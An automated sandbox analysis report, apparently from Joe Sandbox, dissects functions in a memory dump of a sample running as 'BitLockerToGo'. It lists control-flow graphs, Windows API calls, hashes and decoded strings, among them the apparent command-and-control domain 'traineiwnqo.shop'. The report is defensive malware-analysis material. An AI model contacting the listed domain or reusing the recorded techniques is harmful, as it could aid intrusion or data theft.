                  • API String ID: 0-3655222479
                  • Opcode ID: d2453801e8f97ed54468727887571f47c49008e7f4676811120e57c1d158a204
                  • Instruction ID: ca05195c8438397edbbd179e37659689079ba56a29282ad33756255f3b33cd21
                  • Opcode Fuzzy Hash: d2453801e8f97ed54468727887571f47c49008e7f4676811120e57c1d158a204
                  • Instruction Fuzzy Hash: 02F1077A95C3A0DFC7147F79BD9113A7AF1AB8E302F055C79E08582261E23EC516CB19
                  Function 0043238A Relevance: 15.4, Strings: 12, Instructions: 439COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 439 43238a-432399 440 432342-43234d 439->440 441 432511-432528 439->441 442 432330-43233b 439->442 443 4323a0-4323ab 439->443 444 432354-43235f 439->444 445 432604-432610 439->445 446 432598-4325a3 439->446 447 4324ff-43250a 439->447 448 4324ed-4324f8 439->448 449 43267c-432687 439->449 440->441 440->444 440->445 440->446 440->447 440->448 441->440 441->441 441->442 441->443 441->444 441->445 441->446 441->447 441->448 441->449 450 43252f-43253a 441->450 442->440 442->441 442->443 442->444 442->445 442->446 442->447 442->448 443->450 463 4323b2-4323bd 443->463 464 4323d6-4323dc 443->464 465 4323c4-4323cf 443->465 466 4324a9-4324b1 443->466 467 43256f-43257a 443->467 457 432366-432371 444->457 458 4322ea-4322ff 444->458 459 432639-43264b 444->459 460 432378-432380 444->460 471 43261b-43262d 445->471 461 4322c7-4322de 446->461 462 4325aa-4325c1 446->462 447->441 447->445 448->441 448->445 448->446 448->447 451 4326b2-4326bd 449->451 452 4327a0-4327ab 449->452 453 4326a0-4326ab 449->453 454 43296b-432976 449->454 455 4329a8-4329b3 449->455 456 43268e-432699 449->456 450->471 475 432553-432559 450->475 476 432541-43254c 450->476 477 4325c8-4325da 450->477 468 432a53-432a5b 451->468 473 4326c4-4326cf 451->473 474 432308-43231f 451->474 452->468 478 4327e3-43281e call 434110 * 3 452->478 479 4327b2-4327bd 452->479 480 432850-43285b 452->480 481 4327d6-4327dc 452->481 482 432916-43292c call 42ce70 452->482 483 4327c4-4327cf 452->483 484 432904-43290f 452->484 485 4329fb-432a07 452->485 453->451 453->455 454->468 488 432a30-432a47 454->488 489 4329d8-4329ef 454->489 490 43298f-4329a1 454->490 491 43297d-432988 454->491 455->468 469 432a12-432a24 455->469 470 4329ba-4329d1 455->470 456->451 456->453 456->454 456->455 457->459 457->460 458->474 459->457 459->458 459->459 459->460 472 43265e-432675 459->472 460->443 461->458 462->461 462->462 462->472 462->477 463->464 463->465 463->466 463->467 464->450 464->463 464->464 464->465 464->466 464->467 464->472 465->464 465->466 466->448 486 432581-43258d 467->486 487 4325e6-4325f8 467->487 496 432aaa-432ab1 468->496 469->488 470->468 470->469 470->470 470->489 509 4326d6-43272a 470->509 471->459 472->440 472->441 472->442 472->443 472->444 472->445 472->446 472->447 472->448 472->449 473->468 473->469 473->470 473->509 474->442 474->473 474->474 475->467 475->471 475->472 475->475 475->476 475->477 476->471 476->475 477->487 545 432823-43282b call 432bb0 478->545 479->468 479->478 479->481 479->482 479->483 479->484 479->485 480->468 492 432862-43286d 480->492 493 432b42 480->493 494 432b22-432b2f 480->494 495 432b20 480->495 480->496 497 432b49-432b4f call 430e60 480->497 498 432948-432952 480->498 499 4328a8-4328fa call 434110 * 3 480->499 500 432b52-432b58 call 430e60 480->500 501 432b31-432b3a call 430dc0 480->501 502 432896-4328a1 480->502 503 432936-432941 480->503 504 432874 480->504 505 43287a-43288f call 42ce70 480->505 506 432ab8-432ad2 480->506 507 432b3c 480->507 481->468 481->478 481->482 482->503 483->468 483->478 483->481 483->482 483->484 484->468 484->482 485->469 486->446 487->445 488->468 489->485 490->455 490->472 490->488 490->489 490->490 490->491 491->468 491->488 491->490 492->468 492->493 492->494 492->495 492->496 492->497 492->498 492->499 492->500 492->501 492->503 492->504 492->505 492->506 492->507 522 432b44-432b48 493->522 494->522 496->493 496->494 496->495 496->497 496->500 496->506 496->507 497->500 515 432954 498->515 516 432959-432961 498->516 499->484 538 432b5b 500->538 501->522 502->468 502->493 502->494 502->495 502->496 502->497 502->499 502->500 502->501 502->506 502->507 503->468 503->493 503->494 503->495 503->496 503->497 503->498 503->499 503->500 503->501 503->506 503->507 504->505 505->502 519 432b10-432b1f 506->519 520 432ad4 506->520 517 432763-43277c call 433c40 509->517 518 43272c-43272f 509->518 515->516 516->454 541 432783-43278b 517->541 542 43277e 517->542 528 432730-432761 518->528 519->495 530 432ae0-432b0e 520->530 528->517 528->528 530->519 530->530 538->538 541->452 542->541 548 432830-432837 545->548 549 432839 548->549 550 43283e-432846 548->550 549->550 550->480
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: "+C$S*C$S*C$h5'&$h5'&$h5'&$<V $<V $<V $<V $<V $<V
                  • API String ID: 0-3655222479
                  • Opcode ID: 7602eab39c2c201313d188c4bc0090ff34336bd32e4fb99cb3b7f8c0098debae
                  • Instruction ID: dee54a9135f43020f922d350a9eab985568d362a993a0490df3e8edbc65ad605
                  • Opcode Fuzzy Hash: 7602eab39c2c201313d188c4bc0090ff34336bd32e4fb99cb3b7f8c0098debae
                  • Instruction Fuzzy Hash: A3F1167A95C3A0EFC7147F79BD9113A7AF1AB8E302F055C79E08582261E23EC516CB19
                  Function 0040C223 Relevance: 4.3, Strings: 3, Instructions: 575COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 737 40c223-40c24c 738 40c280-40c297 737->738 739 40c24e-40c24f 737->739 742 40c5c0-40c5c7 738->742 743 40c642-40c657 738->743 744 40c607-40c617 call 430e60 738->744 745 40c4ca-40c4e5 738->745 746 40c5ce 738->746 747 40c38f-40c393 738->747 748 40c5d2 738->748 749 40c5d4 738->749 750 40c556-40c56a call 432a90 738->750 751 40c398-40c3ad 738->751 752 40c51c-40c528 738->752 753 40c29e-40c2a0 738->753 754 40c65e-40c667 738->754 755 40c61e-40c62d 738->755 756 40c5a0 738->756 757 40c2a8-40c2c4 738->757 758 40c5eb-40c5f2 738->758 759 40c62e 738->759 760 40c66e 738->760 761 40c5b0 738->761 762 40c670 738->762 763 40c571-40c596 738->763 764 40c5b2 738->764 765 40c3b4-40c419 738->765 766 40c635 738->766 767 40c5b9-40c5bb 738->767 768 40c5f9-40c600 738->768 769 40c4ff-40c501 738->769 740 40c250-40c27e 739->740 740->738 740->740 742->743 742->744 742->746 742->748 742->754 742->755 742->758 742->759 742->760 742->762 742->766 742->768 770 40c952 742->770 773 40c94b-40c94d 742->773 743->744 743->754 743->755 743->758 743->760 743->762 743->768 743->770 771 40c9e6-40ca0c 743->771 772 40c958-40c97e 743->772 743->773 744->755 744->760 744->762 744->770 744->771 744->772 744->773 784 40c4ed-40c4f8 745->784 746->748 778 40c5db-40c5e5 747->778 748->749 749->778 750->742 750->743 750->744 750->746 750->748 750->754 750->755 750->756 750->758 750->759 750->760 750->761 750->762 750->763 750->764 750->766 750->767 750->768 750->770 750->773 751->742 751->743 751->744 751->745 751->746 751->748 751->749 751->750 751->752 751->754 751->755 751->756 751->758 751->759 751->760 751->761 751->762 751->763 751->764 751->765 751->766 751->767 751->768 751->769 781 40c530-40c535 752->781 753->757 754->755 754->760 754->762 754->770 754->771 754->772 754->773 777 40ca42-40ca4b 754->777 783 40c5a5-40c5ab 756->783 775 40c305-40c33c 757->775 776 40c2c6 757->776 758->744 758->755 758->760 758->762 758->768 758->770 758->773 759->766 760->762 761->764 763->783 764->742 764->743 764->744 764->746 764->748 764->754 764->755 764->758 764->759 764->760 764->762 764->766 764->767 764->768 764->770 764->773 779 40c41b 765->779 780 40c44e-40c456 765->780 787 40c63c 766->787 767->781 768->744 768->755 768->760 768->762 768->770 768->771 768->772 768->773 786 40c508-40c515 769->786 799 40c9d0-40c9e0 771->799 800 40ca0e-40ca0f 771->800 794 40c9b0-40c9c0 772->794 795 40c980-40c9ae 772->795 793 40ccdf-40ccf0 773->793 789 40c370-40c379 775->789 790 40c33e-40c33f 775->790 788 40c2d0-40c303 776->788 801 40ca52-40ca54 777->801 802 40ca59 777->802 803 40ce0b-40ce2d 777->803 804 40cd0d-40cd2f 777->804 778->758 796 40c420-40c44c 779->796 797 40c472-40c482 780->797 798 40c458-40c45c 780->798 814 40c53c-40c54f 781->814 783->761 784->742 784->743 784->744 784->746 784->748 784->749 784->750 784->752 784->754 784->755 784->756 784->758 784->759 784->760 784->761 784->762 784->763 784->764 784->766 784->767 784->768 784->769 786->742 786->743 786->744 786->746 786->748 786->749 786->750 786->752 786->754 786->755 786->756 786->758 786->759 786->760 786->761 786->762 786->763 786->764 786->766 786->767 786->768 787->743 788->775 788->788 821 40c37f-40c388 789->821 805 40c340-40c36e 790->805 793->804 794->771 795->794 795->795 796->780 796->796 807 40c484-40c486 797->807 808 40c4a6-40c4c3 797->808 806 40c460-40c470 798->806 799->771 809 40ca10-40ca3e 800->809 810 40ccd8 801->810 802->810 815 40ce6a-40cea1 803->815 816 40ce2f 803->816 812 40cd31 804->812 813 40cd7a-40cdb1 804->813 805->789 805->805 806->797 806->806 827 40c490-40c4a2 807->827 808->745 809->809 828 40ca40 809->828 810->793 818 40cd40-40cd78 812->818 819 40cdf3-40ce05 813->819 820 40cdb3 813->820 814->742 814->743 814->744 814->746 814->748 814->750 814->754 814->755 814->756 814->758 814->759 814->760 814->761 814->762 814->763 814->764 814->766 814->767 814->768 824 40cee3-40cef5 815->824 825 40cea3 815->825 822 40ce30-40ce68 816->822 818->813 818->818 819->803 831 40cdc0-40cdf1 820->831 821->742 821->743 821->744 821->745 821->746 821->747 821->748 821->749 821->750 821->751 821->752 821->754 821->755 821->756 821->758 821->759 821->760 821->761 821->762 821->763 821->764 821->765 821->766 821->767 821->768 821->769 822->815 822->822 824->804 832 40ceb0-40cee1 825->832 827->827 829 40c4a4 827->829 828->799 829->808 831->819 831->831 832->824 832->832
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: P]$WR$traineiwnqo.shop
                  • API String ID: 0-1055694899
                  • Opcode ID: a3f5254058aa14881bdc264bc3de7194c0be4bbe9ed59c204b42949976621c1d
                  • Instruction ID: 787be46ccfb5448780eb9c34431c9d5b7735a6b864a4c23a47a4efe79b747946
                  • Opcode Fuzzy Hash: a3f5254058aa14881bdc264bc3de7194c0be4bbe9ed59c204b42949976621c1d
                  • Instruction Fuzzy Hash: B212767420C381DBD3149F29D890B2BBBE6FFC5314F149A2DE6C687290D7799811CB5A
                  Function 0042D5B9 Relevance: 3.2, APIs: 2, Instructions: 176commemoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 835 42d5b9-42d5bf 836 42d623 835->836 837 42d5c6-42d5c9 835->837 838 42d5cf-42d61c CoCreateInstance 835->838 839 42d62f-42d668 835->839 836->839 837->838 838->836 838->839 840 42d69a-42d6be SysAllocString 839->840 841 42d66a 839->841 843 42d6c2-42d6c7 840->843 842 42d670-42d698 841->842 842->840 842->842 843->836 843->837 843->838 843->839 844 42d5b0 843->844 845 42d490-42d4aa 843->845 846 42d5b6 843->846 847 42d4af-42d53f 843->847 848 42d59d 843->848 844->846 846->835 849 42d541 847->849 850 42d588-42d593 847->850 848->844 851 42d550-42d586 849->851 852 42d597 850->852 851->850 851->851 852->852
                  APIs
                  • CoCreateInstance.OLE32(00437A50,00000000,00000001,00437A40,?), ref: 0042D611
                  • SysAllocString.OLEAUT32(?), ref: 0042D69B
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocCreateInstanceString
                  • String ID:
                  • API String ID: 218245030-0
                  • Opcode ID: 42d8dd0feb32269bc74bdfedda80615c1ec40c8c4500e92ffad46c652e2e7d79
                  • Instruction ID: dcce3a7d076c67f4921e3368af16096dfe40a5b3f23eabbac624cefcb3eef956
                  • Opcode Fuzzy Hash: 42d8dd0feb32269bc74bdfedda80615c1ec40c8c4500e92ffad46c652e2e7d79
                  • Instruction Fuzzy Hash: B76144B4900B00DFD324CF29D985A02BBF1FB4A310F108A5DE89A8BB65C771E845CF95
                  Function 0042E070 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: }E
                  • API String ID: 0-2091753991
                  • Opcode ID: 9972cd6f1a61b6ce9b40030b309b105f05c539f61b9dcf75db01352583a860a1
                  • Instruction ID: 7125fbe81418866ab8e441d2b6c555ed2c620c39b8b4089f4255e3169908306e
                  • Opcode Fuzzy Hash: 9972cd6f1a61b6ce9b40030b309b105f05c539f61b9dcf75db01352583a860a1
                  • Instruction Fuzzy Hash: 1B21AD3270C3344BC72A9E2AD88027FB791DBC5310F9A853FED960B341E5794C01938A
                  Function 0040AB00 Relevance: 14.6, APIs: 3, Strings: 5, Instructions: 608libraryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 551 40ab00-40ab53 552 40ab55 551->552 553 40abac-40abc9 LoadLibraryExW call 4321b0 551->553 554 40ab60-40abaa 552->554 557 40b2fa-40b306 553->557 558 40abcf-40acf6 call 434110 * 12 553->558 554->553 554->554 583 40ad00-40ad18 call 42e070 558->583 586 40ad20-40ad27 583->586 586->586 587 40ad29-40ad3b 586->587 588 40ada1-40adb1 call 40b310 587->588 589 40ad3d-40ad46 587->589 596 40adb7-40adbd 588->596 597 40b008-40b010 588->597 591 40ad50-40ad53 589->591 593 40ad90-40ad93 591->593 594 40ad55-40ad74 call 40cf60 591->594 595 40ad96-40ad9a 593->595 607 40ad76-40ad7c 594->607 608 40ad7e-40ad84 594->608 595->588 596->583 599 40adc3-40aebd 596->599 600 40b012-40b017 597->600 601 40b03f 597->601 603 40af01-40af1a call 40b900 599->603 604 40aebf 599->604 605 40b020-40b032 600->605 606 40b048-40b054 CoInitializeEx 601->606 612 40b2f8 603->612 616 40af20-40af81 603->616 609 40aec0-40aeff 604->609 605->605 611 40b034-40b03d 605->611 606->612 613 40b05a-40b074 CoInitializeSecurity 606->613 607->591 607->608 608->595 609->603 609->609 611->606 612->557 613->612 615 40b07a-40b07f call 42d470 613->615 618 40b084-40b089 615->618 619 40af83 616->619 620 40afc4-40afcf 616->620 618->557 623 40af90-40afc2 619->623 621 40afd5-40afd9 620->621 622 40b08e 620->622 624 40afeb-40afef 621->624 625 40b090-40b092 622->625 623->620 623->623 626 40aff5-40affc 624->626 627 40b2ec-40b2f5 call 430e60 624->627 625->627 628 40b098-40b0b5 625->628 629 40b002 626->629 630 40affe-40b000 626->630 627->612 631 40b104-40b10d 628->631 632 40b0b7 628->632 635 40afe0-40afe5 629->635 636 40b004-40b006 629->636 630->629 637 40b144-40b146 631->637 638 40b10f-40b119 631->638 634 40b0c0-40b102 632->634 634->631 634->634 635->624 635->625 636->635 637->627 641 40b14c-40b154 637->641 640 40b127-40b12b 638->640 640->627 643 40b131-40b138 640->643 642 40b160-40b168 641->642 642->642 644 40b16a-40b16d 642->644 645 40b13a-40b13c 643->645 646 40b13e 643->646 647 40b173-40b175 644->647 648 40b215-40b224 644->648 645->646 649 40b120-40b125 646->649 650 40b140-40b142 646->650 651 40b1e1-40b1e3 647->651 652 40b177-40b180 647->652 653 40b230-40b237 648->653 649->637 649->640 650->649 656 40b1e5-40b1ea 651->656 654 40b197-40b1a4 652->654 653->653 655 40b239-40b24f 653->655 657 40b1a6-40b1ae 654->657 658 40b1ba-40b1ce 654->658 659 40b251 655->659 660 40b28d-40b29d call 40b310 655->660 656->648 661 40b1ec-40b1f9 656->661 665 40b1b0-40b1b3 657->665 666 40b1b5-40b1b8 657->666 668 40b1d0-40b1d8 658->668 669 40b187-40b195 658->669 667 40b253-40b257 659->667 660->627 677 40b29f-40b2ae 660->677 663 40b1fb-40b203 661->663 664 40b20e 661->664 671 40b205-40b207 663->671 672 40b209-40b20c 663->672 664->648 665->666 666->658 673 40b287-40b28a 667->673 674 40b259-40b275 call 40cf60 667->674 675 40b182-40b185 668->675 676 40b1da-40b1df 668->676 669->654 669->656 671->672 672->664 673->660 684 40b277-40b27d 674->684 685 40b27f-40b285 674->685 675->669 676->675 679 40b2b0-40b2b4 677->679 680 40b2d1-40b2e4 call 430e60 677->680 682 40b2c0-40b2cf 679->682 680->606 687 40b2ea 680->687 682->680 682->682 684->667 684->685 685->660 687->612
                  APIs
                  • LoadLibraryExW.KERNELBASE(}E,00000000,00000800), ref: 0040ABB8
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: F7FCEECEE1613DAC5BBF496FDCF17CFE$traineiwnqo.shop$zF$}E$AC
                  • API String ID: 1029625771-989381730
                  • Opcode ID: b48c45031b9f994bd8ee25836514755d76e85341619883c0b23bea207cd72001
                  • Instruction ID: aae1f88d399f8aa2cde1d270c7db2c2ed164cfd98402ebded5167159846009d6
                  • Opcode Fuzzy Hash: b48c45031b9f994bd8ee25836514755d76e85341619883c0b23bea207cd72001
                  • Instruction Fuzzy Hash: 4E1202B05083408FD3109F16D8517AABBE1EFA2304F488A3EE4D56B3D2D7399905CB9E
                  Function 00409C50 Relevance: 4.5, APIs: 3, Instructions: 34COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 713 409c50-409c65 call 409cd0 call 4321f0 718 409c67 713->718 719 409c69-409c76 GetCurrentProcess call 4297c0 713->719 720 409cb0-409cbc ExitProcess 718->720 723 409c78 719->723 724 409c7a-409c90 GetWindowInfo call 40ab00 719->724 725 409ca9-409cae call 432a70 723->725 727 409c95-409c97 724->727 725->720 729 409c99 727->729 730 409c9b-409ca5 call 40d0d0 call 40bf40 727->730 732 409ca7 729->732 730->732 732->725
                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$CurrentExit
                  • String ID:
                  • API String ID: 2333725396-0
                  • Opcode ID: f339c58dedd90c563eb3b79c0e6eb913b10c814dba20f1d5749231ae20ccf13f
                  • Instruction ID: b433b4166e3c936589e6d08321fbf818f94907af9d59bd89a7edafcaf2d4f5f7
                  • Opcode Fuzzy Hash: f339c58dedd90c563eb3b79c0e6eb913b10c814dba20f1d5749231ae20ccf13f
                  • Instruction Fuzzy Hash: F4F0D470C1C21496EA407B769A0A22E7AE46F11309F10053BF982B5297EB7E4D06A69F
                  Function 0042B980 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 942 42b980-42b9cf call 434110 GetUserDefaultUILanguage 946 42b9d4-42b9de 942->946 946->946 947 42b9e0-42b9e6 946->947 948 42b9ed-42b9f3 947->948 949 42ba20-42ba29 948->949 950 42b9f5-42ba1e call 430bd0 948->950 952 42ba30-42ba41 949->952 953 42ba2b 949->953 950->948 953->952
                  APIs
                  • GetUserDefaultUILanguage.KERNELBASE ref: 0042B9A7
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID: DefaultLanguageUser
                  • String ID:
                  • API String ID: 95929093-0
                  • Opcode ID: c15cb6421de718d8dc3b9300246ca54f77bf5203313ab36d1f08ca0bbd26ac73
                  • Instruction ID: fa6eb42784cd1e1343b77ecb8c4b0c97bb6aded786a19dcf31e27c2c89e454f1
                  • Opcode Fuzzy Hash: c15cb6421de718d8dc3b9300246ca54f77bf5203313ab36d1f08ca0bbd26ac73
                  • Instruction Fuzzy Hash: 6221CFB0A042558FC725CF6CD890BADBFF0AF1A320F08059CE495E7391D7309840CB61
                  Function 00430E60 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 955 430e60-430e6e 956 430ee2-430ee8 RtlFreeHeap 955->956 957 430ee0 955->957 958 430e75-430e91 955->958 959 430eee-430ef1 955->959 956->959 957->956 960 430e93 958->960 961 430ed0-430edf 958->961 962 430ea0-430ece 960->962 961->957 962->961 962->962
                  APIs
                  • RtlFreeHeap.NTDLL(?,00000000,?), ref: 00430EE8
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeHeap
                  • String ID:
                  • API String ID: 3298025750-0
                  • Opcode ID: cdc874f61b3fadfe7568a27a3a1b608240852e432268d52aa0c68eaa185e0ef7
                  • Instruction ID: 7273a777f29b50f42d87b323fce27bf3460dc71eab116038a71b473bf1d9341d
                  • Opcode Fuzzy Hash: cdc874f61b3fadfe7568a27a3a1b608240852e432268d52aa0c68eaa185e0ef7
                  • Instruction Fuzzy Hash: 3C01483420C2409BD308EF18D5A0A2ABBF2EFDA714F549A1CE1D6073A1C7349821CB8A
                  Function 00430E34 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 963 430e34-430e3a 965 430e40-430e44 RtlAllocateHeap 963->965
                  APIs
                  • RtlAllocateHeap.NTDLL(?,00000000), ref: 00430E44
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: 4ddeea0bb637734fe95cfd0f13ea94e5784ccc68a715ae6da5ec7bdaa8ba33ee
                  • Instruction ID: fb31d006da82fbae02e73dee1cb3e146a78c51a75b7d13c4449e40ece5c172ba
                  • Opcode Fuzzy Hash: 4ddeea0bb637734fe95cfd0f13ea94e5784ccc68a715ae6da5ec7bdaa8ba33ee
                  • Instruction Fuzzy Hash: EDB01230146110B8D03533111CC5FFF2C6CAF43F55F102014B204140C007546001D17D
                  Function 00432B70 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 966 432b70-432ba2 LdrInitializeThunk
                  APIs
                  • LdrInitializeThunk.NTDLL(00434C8C,005C003F,00000006,?,?,00000018,B8BBBA85,?,?), ref: 00432B9E
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                  • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                  • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                  • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                  Function 0042D6CE Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                  Download Yara Rule
                  APIs
                  • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0042D6DE
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID: BlanketProxy
                  • String ID:
                  • API String ID: 3890896728-0
                  • Opcode ID: f32efda8a408595c931fb99531d39dd756ff8d7ae71045aa7fc273a32605725b
                  • Instruction ID: 747b3e276328743a62f0e7c9697751c71eeaf84b140fb369c79f4d85c3a4c554
                  • Opcode Fuzzy Hash: f32efda8a408595c931fb99531d39dd756ff8d7ae71045aa7fc273a32605725b
                  • Instruction Fuzzy Hash: 9FC048307C0300BBF6321B18FC9BF083624AB03F13F202064B741BC0E08AE266219A2E
                  Function 00430E40 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                  Download Yara Rule
                  APIs
                  • RtlAllocateHeap.NTDLL(?,00000000), ref: 00430E44
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: 5d52d1d82a765bef4afffd9a3f769a468bad52c25b48b3ddc70304e749d59f51
                  • Instruction ID: ed13a04799ba90dd3b0c69080832d03cbb37312c88e831b53e4d2961d0785a6d
                  • Opcode Fuzzy Hash: 5d52d1d82a765bef4afffd9a3f769a468bad52c25b48b3ddc70304e749d59f51
                  • Instruction Fuzzy Hash: D1A00230545151E9D16537116C95F6B29A8AB42A55F101064A215140D046646011D66D

                  Non-executed Functions

                  Function 00421460 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 150COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID: MetricsSystem
                  • String ID: $%$%$%$%$%$%$%$%$%$%$%$%
                  • API String ID: 4116985748-3887349493
                  • Opcode ID: a6516148b308f5a4597ec0f24bee6ae976ca27bcebb5b057435933bfe3050140
                  • Instruction ID: 089af03dff32a6bceaaa964fb1660551ebe4de356021c09c5863518aec456dc9
                  • Opcode Fuzzy Hash: a6516148b308f5a4597ec0f24bee6ae976ca27bcebb5b057435933bfe3050140
                  • Instruction Fuzzy Hash: 739170B05093808FD360DF25D99979BBBF0BB99348F00A91EE5C89B351D7799448CF8A
                  Function 0041AD70 Relevance: 23.1, Strings: 18, Instructions: 566COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: E1G$,/$1a1c$4e:g$6y4{$=m?o$C)N+$T1c3$TG$W5[7$h9^;$o=h?$+)$79$;=$IK$SQ$WU
                  • API String ID: 0-528363291
                  • Opcode ID: 7f2ff2a60bc0d5c88c726a6a78b2811a127e6507d8c4db7af685df84719261de
                  • Instruction ID: a25bd237dfba6a5a2466bbde4e48ce14e1f362d7fd78934378971765c60d971a
                  • Opcode Fuzzy Hash: 7f2ff2a60bc0d5c88c726a6a78b2811a127e6507d8c4db7af685df84719261de
                  • Instruction Fuzzy Hash: 8E62D9B410D3858AE374CF15D481B9ABBE1BB8A304F608E2ED5ED5B245DB74904ACF92
                  Function 0040D0D0 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 405COMMON
                  Download Yara Rule
                  APIs
                  • GetSystemDirectoryW.KERNEL32(C36DC103,00000104), ref: 0040D546
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID: DirectorySystem
